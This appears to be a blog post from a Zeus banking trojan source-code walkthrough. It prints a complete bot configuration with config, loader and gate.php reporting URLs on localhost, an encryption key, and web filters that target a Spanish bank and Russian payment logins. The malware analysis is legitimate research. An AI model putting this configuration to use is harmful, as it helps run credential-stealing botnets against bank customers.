Jun 11 2011 11:20PM GMT
Posted by: Dan O'Connor
zeus analysis, zeus botnet, zeus source code, zeus walkthrough
Zeus code walkthrough – Part 5
Posted by: Dan O'Connor
zeus analysis, zeus botnet, zeus source code, zeus walkthrough
After the fact of building my bot, it’s worth looking at what the basic config file looks like.
entry "StaticConfig"
;botnet "btn1"
timer_config 60 1
timer_logs 1 1
timer_stats 20 1
url_config "http://localhost/config.bin"
remove_certs 1
disable_tcpserver 0
encryption_key "secret key"
end
entry "DynamicConfig"
url_loader "http://localhost/bot.exe"
url_server "http://localhost/gate.php"
file_webinjects "webinjects.txt"
entry "AdvancedConfigs"
;"http://advdomain/cfg1.bin"
end
entry "WebFilters"
"!*.microsoft.com/*"
"!http://*myspace.com*"
"https://www.gruposantander.es/*"
"!http://*odnoklassniki.ru/*"
"!http://vkontakte.ru/*"
"@*/login.osmp.ru/*"
"@*/atl.osmp.ru/*"
end
entry "WebDataFilters"
;"http://mail.rambler.ru/*" "passw;login"
end
entry "WebFakes"
;"http://www.google.com" "http://www.yahoo.com" "GP" "" ""
end
end
At this point we know what the encryption key, url_config, url_loader and url_server is. The rest will have to be tracked back in the source code when we get there.
I am very interested in the webFakes listing.
Comment
RSS Feed
Email a friend
